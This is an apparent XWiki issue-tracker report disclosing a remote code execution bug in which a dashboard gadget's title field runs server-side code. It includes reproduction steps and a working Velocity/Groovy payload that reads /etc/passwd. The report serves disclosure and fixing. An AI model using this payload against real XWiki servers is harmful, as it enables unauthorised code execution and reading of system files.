Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-17794

RCE via Gadget title

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A
    • N/A

    Description

      Registered users are able to execute server side code via gadget title.

      Full path to reproduce:

      1) Create new user on http://playground.xwiki.org/ (or run locally using latest docker image)
      2) Go to profile -> Edit -> My dashboard -> Add gadget
      3) Choose any gadget (e.g. content or python).
      4) Paste following payload into title:

      $request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("javax.script.ScriptEngineManager").getEngineByName("groovy").eval("new File('/etc/passwd').text")

      5) Submit the gadget

      Expected behaviour: User is unable to execute server side code.

      Actual behaviour: User can execute server side code. 

      Attachments

        Issue Links

          is related to

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-14247 User without scripting rights can execute velocity/python scripts through velocity/python gadgets in Dashboard WebHome and User Profile dashboard.

          • Major - Major loss of function.
          • Closed
          links to

          Web Link Github security advisory

          Activity

            People

              surli Simon Urli
              jay_from_future Grigorii Liullin
              Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: